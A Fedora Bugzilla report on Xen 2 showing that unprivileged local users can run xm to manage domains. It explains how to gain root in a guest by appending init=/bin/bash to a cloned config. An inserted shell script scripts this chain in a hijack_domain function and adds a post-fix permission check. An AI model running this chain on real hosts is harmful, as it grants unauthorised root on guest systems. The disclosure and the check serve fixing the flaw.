Bug 161200 - Any local user can create/destroy/... domains and attach to their consoles
Summary: Any local user can create/destroy/... domains and attach to their consoles
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Fedora
Classification: Fedora
Component: xen
Version: 4
Hardware: i386
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Rik van Riel
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
 
Reported: 2005-06-21 10:49 UTC by Nils Toedtmann
Modified: 2007-11-30 22:11 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2006-02-24 20:42:08 UTC
Type: ---
Embargoed:



Description Nils Toedtmann 2005-06-21 10:49:38 UTC
Description of problem:
  Any user can use "/usr/sbin/xm [list|create|console|shutdown|destroy|...]"
  without additional authentication, even with selinux activated.

  You can even clone a domain config into /tmp, append 

    extra +=" init=/bin/bash"

  and gain root access to that domain by shutting it down and booting it with the
  evil clone config.


Version-Release number of selected component (if applicable):
  xen-2-20050522
  kernel-xen0-2.6.11-1.1369_FC4
  kernel-xenU-2.6.11-1.1369_FC4


How reproducible:
  Always


Steps to Reproduce:
  Login as local user (uid!=0) and manage domains with "/usr/sbin/xm".


Actual results:
  You can do whatever you want.


Expected results:
  Only root (or a configurable special user/group) can manage domains.


Additional info:
  This is a known issue. I do not know if it is already fixed completely
  upstream, but as xen moved from tcp sockets to unix sockets for xm/xend
  communication, it should be easy to fix.

  At least with the aid of selinux.
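
Added worked example (not part of the bug report, of the xen package, or of any
commenter's text): it scripts the chain the description above gives, against a
constructed sample domain config, and adds the check a packager would run to
confirm that a fix actually keeps unprivileged users away from domain management.
The socket path /var/run/xend/xend.sock, the "-w" flag of "xm shutdown", and the
contents of the sample config are assumptions; the report does not state them.

```sh
#!/bin/sh
# Added example for bug 161200; not from the report or the xen package.
# Reproduces the attack chain from the description against a CONSTRUCTED
# domain config and gives the post-fix check. Assumed, not stated in the
# report: the xend socket path and the "-w" flag of "xm shutdown".

# Write a constructed Xen 2-style domain config (python syntax) to $1.
# It defines "extra", which the "extra +=" line from the report needs.
sample_config() {
    cat > "$1" <<'EOF'
kernel = "/boot/vmlinuz-2.6.11-1.1369_FC4xenU"
name   = "victim"
memory = 128
disk   = [ 'file:/var/lib/xen/victim.img,sda1,w' ]
root   = "/dev/sda1 ro"
extra  = "3"
EOF
}

# Step 1 of the report: clone a config to a user-writable place and append
# the kernel command-line override. Prints the path of the clone.
make_evil_clone() {
    src="$1"; dst="$2"
    cp "$src" "$dst"
    printf '%s\n' 'extra += " init=/bin/bash"' >> "$dst"
    printf '%s\n' "$dst"
}

# Steps 2 and 3: replace the running domain with the clone. Needs xm and a
# vulnerable xend; never called by the offline demo or the self-test.
hijack_domain() {
    dom="$1"; cfg="$2"
    clone=$(make_evil_clone "$cfg" "/tmp/$dom.evil")
    xm shutdown -w "$dom"       # -w: wait until the domain is gone (assumed flag)
    xm create -c "$clone"       # boots init=/bin/bash and attaches the console
}

# Post-fix check: return 0 if a path is accessible beyond its owner (any
# group/other permission bit set), 1 if owner-only, 2 if absent.
# "stat -c" is GNU coreutils, which Fedora ships.
world_reachable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 2
    case "$mode" in
        *00) return 1 ;;   # 600, 700, ...: owner only
        *)   return 0 ;;
    esac
}

# What an unprivileged user should see on a fixed host: the xend control
# socket is owner-only and "xm list" is refused.
check_fixed() {
    sock="${1:-/var/run/xend/xend.sock}"     # assumed path
    if world_reachable "$sock"; then
        echo "FAIL: $sock is reachable by non-root users"
        return 1
    fi
    if [ "$(id -u)" -ne 0 ] && command -v xm >/dev/null 2>&1 \
       && xm list >/dev/null 2>&1; then
        echo "FAIL: xm list succeeds for uid $(id -u)"
        return 1
    fi
    echo "OK: domain management is not reachable from uid $(id -u)"
}

# Offline demo: build the evil clone from the sample config and show it.
demo() {
    d=$(mktemp -d)
    sample_config "$d/victim"
    make_evil_clone "$d/victim" "$d/victim.evil" >/dev/null
    cat "$d/victim.evil"
    check_fixed || true
    rm -rf "$d"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run it as "sh script.sh demo" to see the cloned config with the appended
"extra" line and the result of the socket check on the local host. The
"xm" calls live only in hijack_domain, so nothing touches a real domain
unless that function is invoked on purpose.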

Comment 1 Michael Paesold 2005-06-22 07:01:38 UTC
I am not sure if this is still relevant with the unix sockets model, but SuSE 
did something about this security issue, read chapter "Security" here:
http://www.suse.de/~garloff/linux/xen/README.SuSE

Quote:
"We changed the xend to observe the xend-privileged-port setting (in
xend-config.sxp). If it's set to 1, xend will only accept configuration
commands from ports below 1024. Together with only binding to localhost,
this should provide a minimum of security against local users to change
virtual machines."

Comment 2 Rik van Riel 2005-06-22 11:46:26 UTC
I agree that this should be improved, but IMHO it should be improved in the
upstream Xen code base and not forked in a distribution package.

I think Xen fixed the issue upstream, so I will upgrade the package in rawhide soon.

Comment 3 Stephen Tweedie 2006-02-24 20:42:08 UTC
This should be fixed in current Xen 3, and I can't reproduce on FC5test releases.

